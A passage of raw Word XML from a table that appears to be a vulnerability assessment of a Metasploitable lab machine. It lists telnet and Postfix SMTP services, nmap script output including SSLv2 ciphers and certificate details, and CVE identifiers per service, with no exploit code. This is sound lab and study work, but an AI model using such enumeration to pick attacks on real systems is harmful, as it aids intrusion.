              <w:t>Allows remote attackers to cause a denial of service (CPU consumption) via an SSH packet that contains duplicate blocks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="09231D41" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="57"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1E58C31E" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4E421E0E" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>23</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5987D5DA" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4B23F312" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>telnet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3D30E270" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>telnetd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="176BC7EB" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2022-1039,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2022-39028,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2021-39615,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2020-8797,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2020-26201,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2017-9482,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2012-4879,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>CVE-2007-3232</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2391" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1CE1450F" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Honestly, there are a lot of possible variants, but in my mind, I chose more related to our case with telnet.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00970F89" w14:paraId="5475347A" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="57"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="737" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2326010F" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00970F89">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="4"/>
              </w:numPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2518" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="04036A01" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>25</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12065BC4" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">_smtp-commands: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>metasploitable.localdomain</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18FB38E9" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>|_</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ssl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-date: 2024-05-19T16:29:03+00:00; +2s from scanner time.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78C2F9CA" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>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ssl</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>-cert: Subject: commonName=ubuntu804-</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>base.localdomain</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/organizationName=OCOSA/stateOrProvinceName=There is no such thing outside US/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>countryName</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>=XX</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6AF5AE98" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>| Not valid before: 2010-03-17T14:07:45</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E37F2EE" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">|_Not valid </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>after:</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">  2010-04-16T14:07:45</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="736F7C15" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">| sslv2: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16F839ED" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>|   SSLv2 supported</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4BD2FC28" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">|   ciphers: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78207A2C" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>|     SSL2_RC2_128_CBC_WITH_MD5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10FBDC8E" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>|     SSL2_RC4_128_EXPORT40_WITH_MD5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2948DCB9" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B487454" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>|     SSL2_DES_192_EDE3_CBC_WITH_MD5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="55A3B386" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>|     SSL2_RC4_128_WITH_MD5</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="042B0303" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>|_    SSL2_DES_64_CBC_WITH_MD5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1080" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="011F29B7" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>smtp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1441" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="238FF79F" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Postfix </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>smtpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1470" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="651B53B2" w14:textId="77777777" w:rsidR="00970F89" w:rsidRDefault="00000000">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVE-2024-27305</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE-2023-51764, </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2011-0411,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2007-3791,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2003-0540,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
              <w:t>CVE-2003-0468,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:br/>
